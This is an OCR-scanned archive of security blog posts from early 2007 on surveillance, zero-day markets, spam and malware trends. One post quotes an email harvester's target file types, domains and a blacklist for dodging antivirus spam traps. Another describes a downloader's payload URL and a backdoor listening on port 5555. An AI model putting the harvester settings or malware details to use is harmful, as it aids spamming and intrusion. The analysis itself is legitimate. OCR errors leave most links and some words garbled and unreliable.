installed unified threat management products, according to 
Wang. " 

And while your organization is multitasking on how to budget 
with the anyway scarce resources due to legal 

requirements to do so, or visionary leaders realizing the soft 
and hard cash losses if you dare to pretend your 

organization wouldn't get breached into, regions around the 
world don't have the incentives to do so. If you bring 



too many people to a party someone always takes a *** in 
the beer, or so they say. Know when to spend, how much, 

on what, and is the timing for your investment the right one 
given the environmental factors of your company. A 

small size business doesn't really need a honeyfarm unless of 
course the admin is putting a personal effort in the job. 

1. http://ddanchev.blo as pot.com/2006/Q7/bud a et-allocation- 
mvo oia-and.html 

2. http://ddanchev.blo as pot.com/2006/05/valuin a -securit v- 
and-prioritizin a- vour.html 

3. 

http://www.chinapost.com.tw/news/archives/business/20071 

6/99290.htm 
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Eyes in London's Sky - Surveillance Poster (2007-01- 
10 14:08) 

Alcohol's bad, drugs are bad, [ljsurveillance is good for 
protecting your from the insecurities we made you become 

paranoid of, and so are [2]head-mounted surveillance cams 
equipped police officers. Sure, but consider the [3]social 

implications too. London may be one of the most important 
business centers in Europe - next to Frankfurt and 

Rotterdam - but I'm so not looking forward to living in what's 
turning into a [4]synonym for 1984. 

1. http://www.si a ns-of-the- 
times.or a/sia ns/pods/watchfuleves. i pg 




















2. http://ddanchev.blo as DOt.com/2006/ll/londons-police- 
experimentin a -with-head.html 

3. http://www.surveillance-and-societv.or g/ 

4. 

http://photosl.blo aa er.eom/x/blo aa er2/4099/2257/1600/579 

84/phr2005spread. ipa 
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Preventing a Massive al-Qaeda Cyber Attack (2007- 
01-10 14:59) 

From the [l]unpragmatic department: 

11 Colarik proposes "a league of cyber communities." The 
world's 20 largest economies would sign a treaty vow-ing to 
manage their own country's cyber activities. Member 
states would then deny traffic to any nation that 
refuses 

to crack down on cyber terrorists. " 

No, he really means it, totally forgetting on how a huge 
percentage of [2]terrorist related web sites are hosted in the 
U.S. Here's the [3]latest example. It gets even more 
shortsighted : 

" Al-Qaeda also publishes a monthly magazine devoted to 
cyber-terrorism techniques. " 

If installing a VMware and PGP Whole Disk Encryption is a 
[4]cyber-terrorism technique, we're all cyber terror¬ 
ists without the radical mode of thinking and the Quran on 
the bookshelf. 













1. http://www.cbn.com/CBNnews/84460.as DX 

2. http://www.ha a anah.or a .il/harchives/005680.html 

3. http://www.ha a anah.or a .il/harchives/005831.html 

4. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 
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It's all About the Vision and the Courage to Execute it 
(2007-01-10 15:21) 

Great article on [l]China's blogging market and the never- 
ending censorship saga. Meet Fang Xingdong, a banned 

journalist who decides to beat them by playing their own 
game, do the math yourself. While heading China's Bokee 

with 14 million bloggers and more than 10,000 new ones 
every day, he's appointed only 10 people to monitor the 

blogs : 

" Of course, the authorities did not allow a completely wide- 
open system. Censorship is still practised, even at Mr. 

Fang's company. Among his 80 employees are 10 people 
who comb through the blogs every day, deleting anything 

deemed to be obscene or politically unacceptable. He hopes 
that the Chinese blogosphere will become self-regulating. 

"If it's more orderly, there will be less pressure on us," he 
says. "I think a blog should have a basic foundation of 
morality and law. / compare it to a person's home. " 














If I were in China, I'd register on his network. 


1. 

http://www.the a lobeandmail.com/servlet/storv/LAC. 2007011 
0 .WATCH ING FANG 10/TPStorv/TPInternational/Asia/ 
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Transferring Sensitive Military Technology (2007-01- 
11 01 : 00 ) 

[l]Busted : 

" China on Tuesday condemned US sanctions imposed last 
week on three Chinese companies for allegedly sell¬ 
ing banned weapons to Iran and Syria, calling the 
accusations "totally groundless". "We strongly oppose this 
and demand the US side correct this erroneous action," 
foreign ministry spokesman Liu Jianchao said at a regular 
press conference. The Chinese firms are among 24 foreign 
entities from several countries hit with the sanctions, 
invoked under the 2005 Iran and Syria Nonproliferation Act. " 

Follow the connection, the U.S is doing business with the 
Chinese companies, who leak it to Iran and Syria, 

who leak it [2]Hezbollah or [3]pretty much everyone at the 
bottom of the food chain. 

More comments - M [4]Foreign Intelligence Services and U.S 
Technology Espionage" and M [5]Hezbollah's use of 59 

Unmanned Aerial Vehicles - UAVs". 

Artillery Rockets image courtesy of [6]Globalsecurity.org 







1. 

http://www.spacewar.com/reports/China Condemns US Sane 
tions On Three Firms_999.html 

2. http://www.defenseindustrvdailv.com/2005/04/hezbollah- 
mirsadl-uav-penetrates-israeli-air-defenses/index. p 

hR 

3. http://www.msnbc.msn.com/id/7477528/ 

4. http://ddanchev.blo as pot.com/2007/01/forei an- 
intelli a ence-services-and-us.html 

5. http://ddanchev.blo as pQt.com/2006/09/hezbollahs-use-of- 
unmanned-aerial.html 

6. http:// a lobalsecuritv.or a/ 
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Head Mounted Surveillance System (2007-01-11 
01:32) 

[l]lt's so cheap and [2]affordable even you can add it to your 
wish list: 

" The new DV Pro Fusion is a cost effective alternative to the 
DV Pro. it is a lightweight, mobile, body worn 

video and audio solution. DV ProFusion has a built in screen 
allowing for live viewing and instant playback. DV 

ProFusion is available in either 30GB hard drive 
capacity, which provides up to 100 hours of video or 
100GB offering 




















450 hours of video, depending on sampling bit rate. 

DV Pro Fusion enables the user to keep both hands free whilst 
recording exactly what they see and hear themselves. DV 
ProFusion is specifically designed to work with a number of 
optional accessories, including an extendable pole and 
additional lens options. 11 

While it's very [3]innovative idea, in five years the current 
models would look like the brick-size like Motorola 

cell phones you all know. I like the idea of storing the footage 
in the device compared to relying via air which makes me 
think of several scenarios for possible abuse or DoS attacks. 

In case you haven't heard [4]public CCTV cameras 

are getting a boost with built-in speakers, so perhaps at a 
later stage it would come to someone's mind to include a 

speaker on the other side of the head too. Two [5]clips to see 
it in [6]action. 

1. http://www.doublevisionsvstems.com/ 

2. http://www.doublevisionsvstems.com/prices.html 

3. http://ddanchev.blo as pot.com/20Q6/ll/londons-police- 
experimentin a -with-head.html 

4. 

http://www.silicon.eom/publicsector/0 . 3800010403 . 3916434 

6. 00.htm 

5. http://www.doublevisionsvstems.com/loftsearch.mov 

6. http://www.doublevisionsvstems.com/li a ht test.mov 
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Security Lifestyle(S) (2007-01-13 18:30) 

If [l]Security is a state of mind, then so is brand loyalty. 
1. http://www.worldaidsdav.or a /default.as p 
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The Life of a Security Threat (2007-01-15 20:40) 

[ 1 ] 

Eye-catching streaming video courtesy of [2]iDefense. In the 
past, iDefense got a lot of publicity due to their 

outstanding [3]cyber intelligence capabilities, and quality 
reports among which my favorite is the one providing a 

complete coverage of the [4]China vs U.S cyberwar due to 
the [5]captured AWACS in case you remember. VeriSign, 

perhaps the last vendor you would think of, purchased the 
company with the idea to diversify its portfolio of services 
and further expand their market propositions, if critical 
infrastructure is what they manage, an IDS signature when 

there's no patch available and wouldn't be not even next 
[6]Patch Tuesday, is invaluable and proactive approach 

for protecting a company's assets. Recently, [7]iDefense 
offered another bounty on zero day vulnerabilities in Vista 

and IE7, but considering that Windows Vista is still not 
adopted on a large corporate and end user scale the way XP 




is, therefore a zero day exploit for Windows XP must have a 
higher valuation then a Windows Vista one. Proving 

Vista is insecure and iDefense taking the credit for it though, 
is a strategic business move rather then a move aiming to 
improve the overal security of their customers - if only could 
iDefense purchase all the exploits from Month 

of the X Bugs initiatives. Moreover, a [8]Vista zero day 
exploit was available for sale. Feel the hypo-meter about 

to explode. Think malicious attackers. Would someone pay 
$50,000 for an exploit of an OS whose adoption by 

corporate and home users is continuing to sparkle debates, 
while an IE6 zero days are offered in between $1000-2000? 

In the time of blogging, there're numerous [9]zero day 
vulnerabilities for sale out there, the way this [10]com- 

mercialization of vulnerability research directly created the - 
thankfully - stil not centralized [ll]underground 

market for vulnerabilities by adding more value to what's 
[12]a commodity from my point of view. Here's a complete 

coverage on [13]how the WMF vulnerability got purchased 
for $4000 in case you want to deepen your knowledge 

into the topic. 

1 . 

http://labs.idefense.com/files/video/loat/loat 585kbps.wmv 

2. http://labs.idefense.com/ 

3. http://ddanchev.blo as pot.com/2006/Q9/cvber-intelli a ence- 
c vberint.html 










4. http://ddanchev.blo as pot.com/2006/Q9/chinese-hackers- 
attackin a -us.html 

5. http://ddanchev.blo as pot.com/2006/Q2/hacktivism- 
tensions.html 

6 . 

http://www.windowsitpro.com/Article/ArticlelD/46065/46065. 
html?Ad = l 

7. http://it.slashdot.or a /article.pl? 
sid=07/01/10/239248&threshold = l 

8. http://www.eweek.eom/article2/0 . 1895 . 2073611 . 00.as o 

9. http://ddanchev.blo as pot.com/2006/03/wheres-mv-0da v- 
olease.html 

10. http://ddanchev.blo as pot.com/2006/Q9/zero-da v- 
initiative-upcomin a -zero-dav.html 

11. http://ddanchev.blo as pot.com/20Q5/12/0bav-how- 
realistic-is-market-for.html 
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12. http://ddanchev.blo as pot.com/2006/Q5/dela vina- 
vesterdavs-Odav-securitv.html 

13. http://ddanchev.blo as pot.com/2006/01/was-wmf- 
vulnerabilit v- purchased-for.html 
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Inside an Email Harvester's Configuration File (2007- 
01-17 13:55) 











































In previous posts on [l]web application email harvesting, 
and the [2]distributed email harvesting honeypot, I com¬ 
mented on a relatively less popular threat - the foundation 
for sending spam and phishing emails, namely collecting 

publicly available email addresses. The other day I came 
across an email harvester and decided to comment on its 

configuration file. 

Type of file extensions to look in : 

TargetFile=abc;abd;abx;adb;ade;adp;adr;bak;bas;cfg;cgi;cls; 

cms;csv;ctl;dbx;dhtm;dsp; 

dsw;eml;fdb;frm;hlp;imb;imh;imh;imm;inbox;ldb;ldif;mbx; 

mda;mdb;mde;mdw; 

mdx;mht;mmf;msg;nab;nch;nfo;nsf;nws;ods;oft;pmr;pp;ppt; 

pst;rtf;slk;sln;sql;stm;tbb;tbi;txt;uin;vap;vcf;myd;html;htm;h 

tt;js; 

asm;asp;c;cpp;h;doc;ini;jsp;log;mes;php;phtm;pl; 

shtml;vbs;xhtml;xls;xml;xml;wsh; 

Domains to look in : 

TargetDomain = ru;com;net;cz;in;info;uk;fr;by;edu;it;de;ua;pl; 
nz;am;tv; 

As you can see, this one is Europe centric. 

Blacklisted usernames and domains : 



Bl ackList= root; info; samples; postmaster; webmaster; noone; no 
body; 

nothing; anyone;someone;your;you; me; bugs; 

rati ng;site;contact;soft;somebody; privacy; service; help;submi 
t;feste; 

gold- 

certs;the.bat;page;admin;support;ntivi;unix;bsd;linux;listser 

v;certific; 

google; accoun;spm;spam;www;secur;abuse; 

.mil;.ftn;@hotmail;(g)msn;(g)microsoft;rating(g); f- 
secur; news; update; 

.gov;@fido;anyone@;bug- 

s@;contract@;feste;gold- 

certs@;help(a);info(a);nobody(a);noon e@; kasp; sopho;@foo; 

@iana;free-av;@messagelab;winzip;winrar;samples; abuse; 

pa nda; cafee; 

spam; pgp;@avp.; noreply; local; root@;postmaster(a); 

.fidonet;subscribe;faq;(a)mtu;.mtu;.mgn;.plesk;.sbor;.port;.ho 

ster; 

@novgorod;(a)quarta;.nsk;.talk;.tomsknet; 

@suct;.lan;.uni-bielefeld;@ruddy;.msk;(a)individual;.interdon; 

@php;@zend; feedback;.lg;.lnx;@hostel;(g)relay; 

.neolocation; @example;.kirov;.z2;.fido;.tula; 



@intercom;@olli;@ozon; @bk;@lipetsk;@ygh; 
.eltex;.invention;.intech;@cityline;.kiev;(a)4ax; 
.senergy;@mail.gmail;(g)butovo; 

F-Secure, Kaspersky, MessageLabs, Panda Software and 
McAfee are taken into consideration, but the best 

part is that the vendors themselves are visionary enought 
not to be using domains or email addresses associated 

with them, for spam and malware traps. 

Thankfully, there're many spam poison projects where these 
crawlers get directed to a huge number of ran¬ 
domly generated email addresses. And while the results are 
evident, namely they're picking them up and poisoning 

their databases with non-existent emails it is questionable if 
that's the best way to fight spam, since the spam¬ 
mers are going to send their message to anyone, even to the 
non-existent email addresses causing network load. 

Something else worth mentioning, these email harvesters are 
starting to pick up [at] and [dot] type of obfuscation too. 
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Here are some more [3]comments on the Spamonomics I 
recently made. Spammer's attitude has to do with 

"Busyness vs Business" factor of productivity mostly, their 
business model is broken, but they just keep on sending 
them without knowing it. 



1. http://ddanchev.blQ as pot.com/2006/06/web-a p plication- 
email-harvestin a -worm.html 


2. http://ddanchev.blo as pot.com/2006/Q9/email-spam- 
harvestin a -statistics.html 

3. 

http://radar.oreillv.com/archives/2007/01/spamonomics_101. 

html 
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Collected in the Wild (2007-01-17 14:58) 

Nothing special, 
looks like a downloader, 

tries to connect to *****.cc/getcommand.php?addtodb=l 

&uid = rtrtrele.Currentll. to get the payload that's packed and 
repacked quite often. File length: 2829 bytes. 

MD5 hash: 2147eb874fefe4e6a90b6ea56e4d629a. 
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The next one is rather more interesting as it's a registry 
backdoor, creating a new service and opening up a listening 
port 5555. File length: 21504 bytes. MD5 hash: 
406e3fc8a2f298al51890b3bee9d7bl8. 

Creates service "msntupd (msntupd)" as 
"C:\WIN DO WS\SYSTEM32\regbd.sys M . 
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Social Engineering and Malware (2007-01-23 20:07) 

With all the buzz over the "Storm Worm" - [l]here's a frontal 
PR attack among vendors - it is almost unbelievable how 
hungry for a ground breaking event, the mainstream media 
is. And it's not even a worm. If you are to report 

each and every outbreak not differentiating itself even with a 
byte from previous "event-based" malware attacks, what 
follows is a flood of biased speculations - too much 
unnecessary attention to current trends and no attention 

to emerging ones. With pre-defined subjects, static file 
names, one level based propagation vector, with the need 

for the end user to OPEN AN .EXE ATTACHMENT FROM AN 
UNKNOWN SOURCE, and with "the" Full _Movie.exe in 

35kb, worldwide scale attacks such as the ones described 
[2]here, are more of a PR strategy - malware with multiple 

propagation vectors has the longest lifecycle, as by 
diversifying it's improving its chances of penetration. Don't 

misunderstand me, protecting the end user from himself is a 
necessity, but overhyping this simple malware doesn't 

really impress anyone with a decent honeyfarm out there. It 
doesn't really matter how aggressively it's getting 

spamed, what matters the ease to filter and enjoying the 
effective rules you've applied. No signatures needed. As 


a matter of fact I haven't seen a corporate email environment 
that's allowing incoming executable files in years, 

especially anything in between 0-50kb, have you? My point 
is that, the end user seems to be the target for this attack, 
since from an attacker's perspective, you have a higher 
chance of success if you try to infect someone who doesn't 

really know whether his AV is running, or cannot recall [3]the 
last time an update was done to at least mitigate the 

risk of infection. These are the real Spam Kings. 

At the beginning of 2006, I discussed the evolving concept of 
[4]localizing malware attacks : 

11 By localization of malware, I mean social engineering 
attacks, use of spelling and grammar free native language 
catches, IP Geolocation, in both when it comes to future or 
current segmented attacks/reports on a national, or city 
level. We are already seeing localization of phishing and 
have been seeing it in spam for quite some time as well. The 

"best" phish attack to be achieved in that case would be, to 
timely respond on a nation-wide event/disaster in the most 
localized way as possible, if I were to also include intellectual 
property theft on such level, it would be too paranoid to 
mention, still relevant I think. Abusing the momentum and 
localizing the attack to target specific users only, would 
improve its authenticity. For instance, I've come across 
harvested emails for sale segmented not only on cities in the 
country involved, but on specific industries as well, that 
could prove invaluable to a malicious attack, given today's 
growth in more targeted attacks, compared to mass ones. " 

The current "events-based" malware is a good example here. 
If it were a piece of malware to automatically exploit the 



targeted PC, then you really have a problem to worry about. 
Meanwhile, Businessweek is running an interesting 

article on [5]Why Antivirus Technology Is Ineffective, and 
stating "white-listing" is the future of malware prevention. 

Could be, if there wasn't ways to bypass the white-listing 
technology, or give a "white-listed" application a Second Life 

- and of course there are. 
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In another piece of [6]quality research written by Mike Bond 
and George Danezis, the authors take us through 

the temptation stage, monitoring, blackmail, voluntary 
propagation, involuntary propagation, and present nice tax¬ 
onomies of rewards and blackmail. 

And if you're still looking for fancy stats and data to go 
through, read this surprisingly well written paper by Microsoft 


[7]Behavioural Modelling of Social Engineering-Based 
Malicious Software. They've managed to spot the most 
popular 

patterns - generic conversation, non-english language used, 
virus alert/software patch required, malware found on 

your computer, no malware found, account information, mail 
delivery error, physical attraction, accusatory, current 


events, and free stuff. 

Current events, free stuff, and malware on your computer are 
the most effective ones from my point of view as they all 
exploit wise psychological tactics. Current events because 
the Internet is a major news source and has always been, 

free stuff, due the myth of "free stuff" on the Internet, and 
the found malware putting the (gullible) end user in a 

"oops it was my turn to get a nasty virus" state of mind. 

1. http://www.watch a uard.com/RSS/showarticle.aspx? 
pack^RSS .Storm, worm 

2. http://www.computerworld.com/action/article.do? 
command=viewArticleBasic&articleld = 9008818 

3. http://ddanchev.blo as pot.com/2QQ6/Q7/anti-virus- 
si a natures-update-it-could.html 

4. 

http://www.packetstormsecuritv.or g/pa pers/ a eneral/malware- 

trends.pdf 
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5. 

http://www.businessweek.com/technolo a v/content/ i an2007/t 
C2007Q122 300717.htm 

6. http://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-666.pdf 

7. 

http://www.microsoft.com/downloads/details.aspx? 

FamilvlD=e0f27260-58da-40db-8785- 

689cf6a05c73&displavlan a 
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Attack of the SEO Bots on the .EDU Domain (2007-01- 
23 20:59) 

A university's Internet presence often results in very high 
pageranks for their site, therefore, if a malicious spammer 
would like to harness the possibilities of having the spammed 
message appear among the top 20 search results, 

he'd figure out a way to post direct http:// links on various 
.edu domains, especially on the wikis residing there. 

That's the case with PuppetID : Matias Colins - of course 
collins is spelled with one L only Matias Colins is an 
automated attack script that's already hosting hundreds of 
[l]spam pages on the [2].edu domain, mostly adult 

related, and it's worth mentioning that where access to a 
directory has been in place, the hosted pages blocked 

caching from any search engine, or hosted one on its own. 
Redirection is perhaps what the attacker is very 

interested in too. See how this berkeley.edu link - 

dream.sims.berkeley.edu/ tdennis/wp- 
content/animalsex.php 

- redirects to a site for whatever the page title says, and this 
is yet another one - oit.pdx.edu/jethrotest/mysqldb.php. 

Here are two more examples of [3]another bot using my blog 
post titles to generate subdomains or the like, 



and of bots [4]abusing Ebay's reputation system by self- 
recommending themselves. 

1. http://www. a oo a le.com/search? 

as q = hentai+free+pictures&hl=en&num=100&btnG=Goo al 
e+Search&as_e pq = &as_oq = &as_e 

q = &lr=&as_ft=i&as_filet v pe=&as_qdr=all&as_nlo=&as_nhi 

2. http://www. a oo a le.com/search? 

num=100&am p:amp: hl=en&lr=&as adr=all&a = porn+free+ 
pictures+site%3Aedu 

3. http://ddanchev.blo as pot.com/20Q6/lQ/automated-seo- 
s pam- a eneration.html 

4. http://ddanchev.blo as pot.com/2QQ6/Q8/but-of-course-its- 
pleasant-transaction.html 
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The Zero Day Vulnerabilities Cash Bubble (2007-01-25 
17:29) 

The [1]WMF was reportedly sold for $4000, a [2]Vista zero 
day was available for sale at $50,000, and now [3]private 

vulnerability brokers claim that they beat both the 
underground and the current incentive programs, while 
selling 

vulnerabilities in between $75,000 - $120,000. 

11 The co-founder of security group Secure Network 
Operations Software (SNOSoft), Desautels has claimed to 



























have brokered a number of deals between researchers and 
private firms-as well as the odd government agency-for 

information on critical flaws in software. Last week, he 
bluntly told members of SecurityFocus's BugTraq mailing list 
and the Full-Disclosure mailing list that he could sell 
significant flaw research, in many cases, for more than 
$75,000. 

"I've seen these exploits sell for as much as $120,000," 
Desautels told SecurityFocus in an online interview. " 

But the cash bubble is rather interesting. Zero day 
vulnerabilities are an over-hyped commodity and paying to 

get yourself protected from one, means you'll be still 
exposed to the next one while you could have been dealing 
with 

far more risky aspects of protecting your network, or 
customers. The (legitimate) business model breaks when 
every 

vendor starts offering a "bounty" for vulnerabilities while 
disintermediating the current infomediaries. It would be 
definitely more cost-effective for them, than improving 
someone's profit margins. Or they could really reboot their 

position in this situation by applying some [4]fuzz logic on 
their own software at the first place. 

1. http://it.slashdot.or a /article.pl7sid = 06/02/02/215210 

2. http://it.slashdot.or g /article.pl7sid = 06/12/16/196213 

3. http://www.securitvfocus.com/news/11437 

4. http://en.wikipedia.or g /wiki/Fuzz testin g 
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Who's Who on Information and Network Security in 
Europe (2007-01-25 17:36) 

A very [l]handy summary of Europe's infosec entities and 
contact details that come as a roadmap for possible 

partnerships or analyst's research : 

" This Directory serves as the "Yellow pages" of Network and 
Information Security in Europe. As such, it is a powerful tool 
in everyday life of all European stakeholders and actors in 
Network and Information Security (NIS). By having access to 
all contact data and entry points for all European actors in 
one booklet, available on your desk, the 

",arm length's rule" of access to information is becoming 
concrete. I am confident that this device of compiled 
Network and Information Security stakeholders, contacts, 
websites, areas of responsibility/activity of national and 
European Authorities, including organisations acting in 
Network Security and Information, serves our mission to 
enhance the NIS security levels in Europe well. " 

Compared to [2]China's information security market on which 
I've blogged in a previous post, Europe's R &D 

efforts are still largely de-centralized on a country level, but 
hopefully, with the ongoing initiatives among member 

states innovation will prevail over bureaucracy. 

1 . 

http://www.enisa.europa.eu/doc/pdf/deliverables/wiw_v2_200 
6. pdf 





2. http://ddanchev.blo as pot.com/20Q6/10/chinas- 
information-securitv-market.html 
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Threats of Using Outsourced Software (2007-01-25 
17:57) 

[1] Self-efficiency in (quality) software programming for 
security reasons - yeah, sure : 

" The possibility that programmers might hide Trojan horses, 
trapdoors and other malware inside the code 

they write is hardly a new concern. But the DSB will say in its 
report that three forces — the greater complexity of systems, 
their increased connectivity and the globalization of the 
software industry — have combined to make the 

malware threat increasingly acute for the DOD. "This is a 
very big deal," said Paul Strassmann, a professor at George 
Mason University in Fairfax, Va., and a former CIO at the 
Pentagon. "The fundamental issue is that one day, under 
conditions where we will badly need communications, we will 
have a denial of service and have billion-dollar weapons 
unable to function. 11 

The billion-dollar weapons system will be unable to function 
in case of an ELINT attack, not a software backdoor taking 
the statistical approach. 

There's an important point to keep in mind, during WWII, the 

[2] U.S attacted Europe's brightest minds who later on 

set the foundations for the U.S becoming a super power. Still, 
you cannot expect to produce everything on your own, 






and even hope of being more efficient in producing a certain 
product in the way someone who specialized into doing 

this, can. Start from the basics, what type of OS does your 
Intelligence angency use in order not to have to build a 

new one and train everyone to use it efficiently? Say it with 
me.. Moreover, the sound module in your OS has as a 

matter of fact already been outsourced to somewhere else, if 
you try to control the process with security in mind, 

vendors will cut profit margin sales, as they will have to pay 
more for the module, will increase prices slowing down 

innovation. But of course it will give someone a very false 
feeling of security. 

Fears due to outsourced software? 

Try budgeting with the secondary audits "back home" if truly 
paranoid 

and want to remain cost-effective. While it may be logically 
more suitable to assume "coded back home means 

greater security and less risk", you'll be totally wrong. All 
organizations across the world connect using standart 
protocols, and similar operating systems, making them all 
vulnerable to a single threats of what represent today's 

network specific attacks. And no one is re-inventing the OSI 
model either. 

You can also consider another task force, one that will come 
up with layered disinformation channel tactics 



when they find out such a backdoor, as detecting one and 
simply removing it on such systems would be too impulsive 

to mention. 

1. http://www.comDuterworld.com/action/article.do? 
command=viewArticleBasic&articleld = 2 74599 

2 . 

http://en.wikipedia.or a /wiki/Science_and_technolo a vJn_the 
United States#Science immi g ration 

75 


£ 


Testing Anti Virus Software Against Packed Malware 
(2007-01-25 18:30) 

Very interesting idea as [l]packed malware is something 
rather common these days, and as we've seen the recent use 

of commercial packers in the M [2]skype trojan" malware 
authors are definitely aware of the concept. [3]What the 
authors did was to pack the following malware using 21 
different packers/software protectors - Backdoor.Win32.BO 
Jn- 

staller, Email-Worm.Win32.Bagle, Email- 

Worm.Win32.Menger, Email-Worm.Win32.Naked, Email- 

Worm. Wi n3 2.Swen, 

Worm.Win32.AimVen, Trojan-PSW.Win32.Avisa, Trojan- 
Clicker.Win32.Getfound, and scan them with various anti 
virus 

software to measure which ones excel at detecting packed 
malware. What some vendors are best at detecting others 











doesn't have a clue about, but the [4]more data to back up 
your personal experience, the better for your decision¬ 
making. 

1. http://www.anti- 

malware.ru/doc/packers su p port 08.2006.pdf 

2. http://ddanchev.blo as pot.com/20Q7/01/technical-analvsis- 
of-sk v pe-tro i an.html 

3. http://anti-malware.ru/index.phtml?part=tests 

4. http://www.anti- 

malware.ru/doc/packers su p port 08.2006.xls 
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Visual Thesaurus on Security (2007-01-26 17:19) 

In case you haven't heard of the [l]Thinkmap Visual 
Thesaurus, it's an " interactive dictionary and thesaurus 
which creates word maps that blossom with meanings and 
branch to related words. Its innovative display encourages 
exploration and learning. You'll understand language in a 
powerful new way. " With its current database size and 
outstanding usability build into the interface, it has a lot of 
potential for growth, and I'm sure you'll find out the same if 
you play with it for a little while. 

1. http://www.visualthesaurus.com/ 
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Clustering Phishing Attacks (2007-01-26 18:06) 




















[ 1 ]CIustering a phishing attack to get an [2]in-depth and 
complete view on the inner workings of a major phishing 

outbreak or a specific campaign only - that's just among the 
many other applications of the [3]lnternetPerils. Backed 

up with neat visualization features, taking a layered 
approach, thus, make it easier for analysts do their jobs 
faster, its capabilities are already scoring points in the 
information security industry : 

11 InternetPerils has discovered that those phishing servers 
cluster, and infest ISPs at the same locations for weeks or 
months. Here's an example of a phishing cluster in Germany, 
ever-changing yet persistent for four months, according to 
path data collected and processed by InternetPerils, using 
phishing server addresses from the Anti-Phishing Working 
Group [4] (APWG)repository The above animation 
demonstrates a persistent phishing cluster detected and 
analyzed by InternetPerils using server addresses from 20 
dumps of the APWG repository, the earliest shown 17 May 
and the 

latest 20 September. This phishing cluster continues to 
persist after the dates depicted, and InternetPerils continues 
to track it. " 

Here are seven other [5]interesting anti-phishing projects, 
and a [6]hint to the ISPs who really want to know what 

their customers are (unknowingly) up to. 

1. http://www.internetperils.com/perilwatch/20060928. Dho 

2. http://www.internetperils.com/perilwatch/20050421. php 

3. http://www.internetperils.com/ 










4. http://www.antiphishin a .or g/ 


5. http://ddanchev.blo as pot.com/2006/Q9/interestin a -anti- 
phishin a- oro i ects.html 

6. http://www.internetperils.com/products/phishcam. php 
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PR Storm (2007-02-01 15:31) 

Great to see that [l]Mike Rothman and [2]Bill Brenner know 
how to read between the lines. Here's a related point 

of view on the Storm Worm - [3]Why do users still receive 
attachments they are not supposed to click on? 

Meanwhile, [4]Eric Lubow (Guardian Digital, 
Linuxsecurity.com) have recently joined the security 
blogosphere 

and I'll be keeping an eye on his blog for sure - hope it's 
mutual. Two more rather fresh blogs worth reading are 

[5]ITsecurity.com's one - how's it going Kev - and [6]Panda 
Software's blog. And with PandaLabs now blogging, 

the number of anti virus vendors without a blog, namely still 
living in the press release world is getting smaller. I 

remember the last time I was responsible for writing press 
releases for a vendor I'd rather not associate myself with, and 













how Web 1.0 the whole practice was. If you really want to 
evolve from branding to communicating value, hire a 

blogger that's anticipating corporate citizenship given he's 
commissioned, and reboot your PR channels. 

1. http://securitvindte.eom/TDI-2007-01-24#TBPl 

2 . 

http://searchsecuritv.techtar a et.eom/columnltem/0 . 294698 .si 
d!4 a cil240768 . 00.html 

3. http://isc.sans.or a /diar v.ph p?storvid = 2136 

4. http://eric.lubow.or a /blo a/ 

5. http://www.itsecuritv.com/blo a/ 

6. http://blo as. pandasoftware.com/ 
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Old Media VS New Media (2007-02-01 15:58) 

The never ending war of [l]corporate interests between 
[2]the old and the new media, seems to be re-emerging on 

a weekly basis. Obviously, newspapers don't really like 
Google picking up their content and making money without 

giving them any commissions - they don't even have to - 
and with more shortsighted local newspaper unions 

asking Google and Yahoo! to stop doing so, I'm so looking 
forward for the moment in the near future when we'll be 





















discussing their will to get crawled again. You fear what you 
don't understand, and the old media doesn't like the way it 
got re-intermediated, thus losing its overhyped content 
generation exclusiveness. In a Web 2.0 world, everyone 

generates content, which later on gets mixed, re-mixed, 
syndicated and aggregated, what if newspapers really tried 

to adapt instead of denying the future? And isn't it ironic that 
the newspapers that want to be removed from any 

search engine's index, are later on using these search 
engines while investigating for their stories? 

Here's a lengthy comment I recently made on the [3]old 
media vs the new one. 

1 . 

htto://www. webDronews.com/insiderreoorts/searchinsider/w p 
n-49-20070119Bel a iansNowFi a htin a WithYahoo.html 
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2 . 

http://www.infoworld.com/article/07/01/19/HNnews pa pers ao 
aftervahoo l.html 

3. http://www.techdirt.com/articles/20070112/105914.shtml 
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The TalkRization of My Blog (2007-02-01 18:18) 

[1] 

The service is quite intuitive for a free one, and I must say I 














never actually got the time to run a podcast on my one, so 
TalkR seems like the perfect choice for those of you - 

including me - who want to listen to my blog posts. Here's 
the [2]TalkR feed URL for you to syndicate, and several 

samples : 

- [3]Social Engineering and Malware 

- [4]The Life of a Security Threat 

- [5]Russia's Lawful Interception of Internet Communications 

- [6]Foreign Intelligence Services and U.S Technology 
Espionage 

- [7]Technical Analysis of the Skype Trojan 

- [8]Old Media VS New Media 

By the way, when was the last time you met a girl who 
speaks stuff like this? 

1. http://www.talkr.com/ 

2. http://www.talkr.com/a p p/cast_pods.a p p7feed_id = 26043 

3. http://www.talkr.eom/audio/d/a/n/c/975512.m p3 

4. http://www.talkr.eom/audio/d/a/n/c/964269.m p3 

5. http://www.talkr.eom/audio/d/a/n/c/964281.m p3 

6. http://www.talkr.eom/audio/d/a/n/c/964286.m D3 

7. http://www.talkr.eom/audio/d/a/n/c/964287.m p3 

8. http://www.talkr.eom/audio/d/a/n/c/989716.m p3 
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Attack of the Biting UAVs (2007-02-02 18:40) 

Remotely controlled [l]unmanned aerial vehicles have been 
shifting usability from defensive(reconnaissance) to 

offensive([2]weapons payload) for the last several years. 
Working prototypes in the shadows of secrecy reaching yet 

another long-range flight milestone are setting up the 
foundations for a [3]different kind of warfare. And while the 

concept has the potential of saving lifes, and of course taking 
some while protecting the pilot, it will take several 

more years before fleets of drones are fully capable of 
integrating their benefits in the NCW field. 

Here's an in-depth article on the [Revolution of UAVs to 
UCAVS: 

11 Robotic air vehicles are beginning to replace some of the 
Air Force's manned combat aircraft. Soon, they will be 
handling a major share of the service's strike mission. The 
first steps in this transition already have been taken in the 
field of fighter-class aircraft. Classified projects now in 
development seem sure to cut into the manned medium and 
heavy bomber roles, as well. The Predator MQ-1 is leading 
this transition. A familiar feature of Air Force combat 
operations for more than a dozen years, the spindly Predator 
has evolved dramatically, it is no longer simply a loitering 

"eye in the sky" but rather a versatile weapon system 
capable of destroying a couple of ground targets on its own 
or in collaboration with other aircraft. It is in great demand, 


and the Air Force is acquiring Predators as fast as it can 
absorb them. Now in early production is a souped-up version 
of the Predator , the MQ-9 Reaper. Its combat payload- 
missiles and bombs carried on underwing hardpoints— 
roughly equals that of an F-16 fighter. In the Reaper, the Air 
Force has found a craft that truly combines the powers of a 
